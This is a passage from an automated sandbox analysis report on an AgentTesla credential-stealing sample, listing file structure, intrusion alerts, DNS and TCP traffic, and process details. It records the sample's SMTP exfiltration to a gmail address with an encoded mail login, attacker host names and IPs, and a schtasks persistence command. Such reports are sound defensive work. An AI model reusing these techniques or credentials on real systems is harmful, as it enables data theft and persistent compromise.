IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb1c10	0xb1e00	False	0.7931252196064652	data	7.533959618381255	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x608	0x800	False	0.33349609375	data	3.4497386267724677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb4090	0x378	data
RT_MANIFEST	0xb4418	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6111.118.212.38497235872030171 11/29/22-19:38:19.561263	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49723	587	192.168.2.6	111.118.212.38
192.168.2.6111.118.212.38497185872030171 11/29/22-19:37:32.174046	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49718	587	192.168.2.6	111.118.212.38

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 19:37:07.584291935 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:07.584352016 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:07.584460974 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:07.676655054 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:07.676713943 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:07.981940985 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:07.982059002 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:07.986948967 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:07.986968040 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:07.987286091 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:08.115922928 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:09.107095003 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:09.107141018 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:09.254287958 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:09.254414082 CET	443	49713	3.220.57.224	192.168.2.6
Nov 29, 2022 19:37:09.254643917 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:09.275145054 CET	49713	443	192.168.2.6	3.220.57.224
Nov 29, 2022 19:37:27.280982018 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:27.559288979 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:27.559411049 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:28.572220087 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:28.572333097 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:29.863013029 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:29.869247913 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:30.148148060 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:30.150072098 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:30.429714918 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:30.430197001 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:30.751842976 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:31.260838985 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:31.261821985 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:31.541266918 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:31.541328907 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:31.541712999 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:31.860230923 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:31.893450022 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:31.893871069 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:32.172013044 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:32.172235012 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:32.174046040 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:32.174232006 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:32.174340963 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:32.174438953 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:32.454286098 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:32.454948902 CET	587	49718	111.118.212.38	192.168.2.6
Nov 29, 2022 19:37:32.508652925 CET	49718	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:37:53.167459011 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:53.167522907 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:53.167608976 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:53.205972910 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:53.206012011 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:53.510446072 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:53.510565996 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:53.513940096 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:53.513962984 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:53.514383078 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:53.652631998 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:54.518997908 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:54.519059896 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:54.751689911 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:54.751791000 CET	443	49720	3.232.242.170	192.168.2.6
Nov 29, 2022 19:37:54.752917051 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:37:54.754750013 CET	49720	443	192.168.2.6	3.232.242.170
Nov 29, 2022 19:38:15.748650074 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:16.021739006 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:16.021903038 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:17.044811010 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:17.049279928 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:17.323196888 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:17.323652983 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:17.597578049 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:17.598759890 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:17.912106991 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:18.662144899 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:18.662529945 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:18.936058044 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:18.936109066 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:18.936378002 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:19.257188082 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:19.277188063 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:19.277587891 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:19.559030056 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:19.559258938 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:19.561263084 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:19.561371088 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:19.561435938 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:19.561502934 CET	49723	587	192.168.2.6	111.118.212.38
Nov 29, 2022 19:38:19.834079981 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:19.835743904 CET	587	49723	111.118.212.38	192.168.2.6
Nov 29, 2022 19:38:19.887628078 CET	49723	587	192.168.2.6	111.118.212.38

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 19:37:07.495767117 CET	49448	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:37:07.512861967 CET	53	49448	8.8.8.8	192.168.2.6
Nov 29, 2022 19:37:07.538335085 CET	59082	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:37:07.555747032 CET	53	59082	8.8.8.8	192.168.2.6
Nov 29, 2022 19:37:26.407497883 CET	63229	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:37:26.803889990 CET	53	63229	8.8.8.8	192.168.2.6
Nov 29, 2022 19:37:26.886347055 CET	62538	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:37:27.278209925 CET	53	62538	8.8.8.8	192.168.2.6
Nov 29, 2022 19:37:53.002229929 CET	51530	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:37:53.021419048 CET	53	51530	8.8.8.8	192.168.2.6
Nov 29, 2022 19:37:53.077909946 CET	56122	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:37:53.096793890 CET	53	56122	8.8.8.8	192.168.2.6
Nov 29, 2022 19:38:15.257229090 CET	61609	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:38:15.647279024 CET	53	61609	8.8.8.8	192.168.2.6
Nov 29, 2022 19:38:15.719681025 CET	52481	53	192.168.2.6	8.8.8.8
Nov 29, 2022 19:38:15.738940954 CET	53	52481	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 19:37:07.495767117 CET	192.168.2.6	8.8.8.8	0xf41e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.538335085 CET	192.168.2.6	8.8.8.8	0xd51f	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:26.407497883 CET	192.168.2.6	8.8.8.8	0x43b6	Standard query (0)	mail.strictfacilityservices.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:26.886347055 CET	192.168.2.6	8.8.8.8	0xe34c	Standard query (0)	mail.strictfacilityservices.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.002229929 CET	192.168.2.6	8.8.8.8	0x837b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.077909946 CET	192.168.2.6	8.8.8.8	0xa76c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:38:15.257229090 CET	192.168.2.6	8.8.8.8	0x3a2e	Standard query (0)	mail.strictfacilityservices.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:38:15.719681025 CET	192.168.2.6	8.8.8.8	0xc385	Standard query (0)	mail.strictfacilityservices.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 19:37:07.512861967 CET	8.8.8.8	192.168.2.6	0xf41e	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:37:07.512861967 CET	8.8.8.8	192.168.2.6	0xf41e	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.512861967 CET	8.8.8.8	192.168.2.6	0xf41e	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.512861967 CET	8.8.8.8	192.168.2.6	0xf41e	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.512861967 CET	8.8.8.8	192.168.2.6	0xf41e	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.555747032 CET	8.8.8.8	192.168.2.6	0xd51f	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:37:07.555747032 CET	8.8.8.8	192.168.2.6	0xd51f	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.555747032 CET	8.8.8.8	192.168.2.6	0xd51f	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.555747032 CET	8.8.8.8	192.168.2.6	0xd51f	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:07.555747032 CET	8.8.8.8	192.168.2.6	0xd51f	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:26.803889990 CET	8.8.8.8	192.168.2.6	0x43b6	No error (0)	mail.strictfacilityservices.com	strictfacilityservices.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:37:26.803889990 CET	8.8.8.8	192.168.2.6	0x43b6	No error (0)	strictfacilityservices.com		111.118.212.38	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:27.278209925 CET	8.8.8.8	192.168.2.6	0xe34c	No error (0)	mail.strictfacilityservices.com	strictfacilityservices.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:37:27.278209925 CET	8.8.8.8	192.168.2.6	0xe34c	No error (0)	strictfacilityservices.com		111.118.212.38	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.021419048 CET	8.8.8.8	192.168.2.6	0x837b	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:37:53.021419048 CET	8.8.8.8	192.168.2.6	0x837b	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.021419048 CET	8.8.8.8	192.168.2.6	0x837b	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.021419048 CET	8.8.8.8	192.168.2.6	0x837b	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.021419048 CET	8.8.8.8	192.168.2.6	0x837b	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.096793890 CET	8.8.8.8	192.168.2.6	0xa76c	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:37:53.096793890 CET	8.8.8.8	192.168.2.6	0xa76c	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.096793890 CET	8.8.8.8	192.168.2.6	0xa76c	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.096793890 CET	8.8.8.8	192.168.2.6	0xa76c	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:37:53.096793890 CET	8.8.8.8	192.168.2.6	0xa76c	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:38:15.647279024 CET	8.8.8.8	192.168.2.6	0x3a2e	No error (0)	mail.strictfacilityservices.com	strictfacilityservices.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:38:15.647279024 CET	8.8.8.8	192.168.2.6	0x3a2e	No error (0)	strictfacilityservices.com		111.118.212.38	A (IP address)	IN (0x0001)	false
Nov 29, 2022 19:38:15.738940954 CET	8.8.8.8	192.168.2.6	0xc385	No error (0)	mail.strictfacilityservices.com	strictfacilityservices.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 19:38:15.738940954 CET	8.8.8.8	192.168.2.6	0xc385	No error (0)	strictfacilityservices.com		111.118.212.38	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49713	3.220.57.224	443	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Timestamp	Direction	Data
2022-11-29 18:37:09 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-11-29 18:37:09 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Tue, 29 Nov 2022 18:37:09 GMT Content-Length: 14 Via: 1.1 vegur
2022-11-29 18:37:09 UTC	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 Data Ascii: 102.129.143.49

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49720	3.232.242.170	443	C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Timestamp	Direction	Data
2022-11-29 18:37:54 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-11-29 18:37:54 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Tue, 29 Nov 2022 18:37:54 GMT Content-Length: 14 Via: 1.1 vegur
2022-11-29 18:37:54 UTC	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 Data Ascii: 102.129.143.49

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 29, 2022 19:37:29.863013029 CET	587	49718	111.118.212.38	192.168.2.6	220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 18:37:29 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 29, 2022 19:37:29.869247913 CET	49718	587	192.168.2.6	111.118.212.38	EHLO 927537
Nov 29, 2022 19:37:30.148148060 CET	587	49718	111.118.212.38	192.168.2.6	250-bh-in-36.webhostbox.net Hello 927537 [102.129.143.49] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 29, 2022 19:37:30.150072098 CET	49718	587	192.168.2.6	111.118.212.38	AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
Nov 29, 2022 19:37:30.429714918 CET	587	49718	111.118.212.38	192.168.2.6	334 UGFzc3dvcmQ6
Nov 29, 2022 19:37:31.260838985 CET	587	49718	111.118.212.38	192.168.2.6	235 Authentication succeeded
Nov 29, 2022 19:37:31.261821985 CET	49718	587	192.168.2.6	111.118.212.38	MAIL FROM:<accounts@strictfacilityservices.com>
Nov 29, 2022 19:37:31.541328907 CET	587	49718	111.118.212.38	192.168.2.6	250 OK
Nov 29, 2022 19:37:31.541712999 CET	49718	587	192.168.2.6	111.118.212.38	RCPT TO:<guc850155@gmail.com>
Nov 29, 2022 19:37:31.893450022 CET	587	49718	111.118.212.38	192.168.2.6	250 Accepted
Nov 29, 2022 19:37:31.893871069 CET	49718	587	192.168.2.6	111.118.212.38	DATA
Nov 29, 2022 19:37:32.172235012 CET	587	49718	111.118.212.38	192.168.2.6	354 Enter message, ending with "." on a line by itself
Nov 29, 2022 19:37:32.174438953 CET	49718	587	192.168.2.6	111.118.212.38	.
Nov 29, 2022 19:37:32.454948902 CET	587	49718	111.118.212.38	192.168.2.6	250 OK id=1p05U4-002GFu-0G
Nov 29, 2022 19:38:17.044811010 CET	587	49723	111.118.212.38	192.168.2.6	220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 18:38:16 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 29, 2022 19:38:17.049279928 CET	49723	587	192.168.2.6	111.118.212.38	EHLO 927537
Nov 29, 2022 19:38:17.323196888 CET	587	49723	111.118.212.38	192.168.2.6	250-bh-in-36.webhostbox.net Hello 927537 [102.129.143.49] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 29, 2022 19:38:17.323652983 CET	49723	587	192.168.2.6	111.118.212.38	AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
Nov 29, 2022 19:38:17.597578049 CET	587	49723	111.118.212.38	192.168.2.6	334 UGFzc3dvcmQ6
Nov 29, 2022 19:38:18.662144899 CET	587	49723	111.118.212.38	192.168.2.6	235 Authentication succeeded
Nov 29, 2022 19:38:18.662529945 CET	49723	587	192.168.2.6	111.118.212.38	MAIL FROM:<accounts@strictfacilityservices.com>
Nov 29, 2022 19:38:18.936109066 CET	587	49723	111.118.212.38	192.168.2.6	250 OK
Nov 29, 2022 19:38:18.936378002 CET	49723	587	192.168.2.6	111.118.212.38	RCPT TO:<guc850155@gmail.com>
Nov 29, 2022 19:38:19.277188063 CET	587	49723	111.118.212.38	192.168.2.6	250 Accepted
Nov 29, 2022 19:38:19.277587891 CET	49723	587	192.168.2.6	111.118.212.38	DATA
Nov 29, 2022 19:38:19.559258938 CET	587	49723	111.118.212.38	192.168.2.6	354 Enter message, ending with "." on a line by itself
Nov 29, 2022 19:38:19.561502934 CET	49723	587	192.168.2.6	111.118.212.38	.
Nov 29, 2022 19:38:19.835743904 CET	587	49723	111.118.212.38	192.168.2.6	250 OK id=1p05Up-002Gde-Cs

Target ID:	0
Start time:	19:36:26
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Imagebase:	0xcf0000
File size:	731648 bytes
MD5 hash:	65CF34490748F7924DB84DC043F5D81E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	8
Start time:	19:36:52
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp
Imagebase:	0x960000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	19:36:52
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	19:36:53
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x780000
File size:	731648 bytes
MD5 hash:	65CF34490748F7924DB84DC043F5D81E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.525329197.0000000002B54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	11
Start time:	19:36:53
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\IwUNvHNy.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\IwUNvHNy.exe
Imagebase:	0x3a0000
File size:	731648 bytes
MD5 hash:	65CF34490748F7924DB84DC043F5D81E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Target ID:	12
Start time:	19:37:38
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp
Imagebase:	0x960000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	19:37:38
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	14
Start time:	19:37:39
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\IwUNvHNy.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xcf0000
File size:	731648 bytes
MD5 hash:	65CF34490748F7924DB84DC043F5D81E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.525739728.0000000003164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	184
Total number of Limit Nodes:	7

Executed Functions

Function 0177B8C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
threadCOMMON

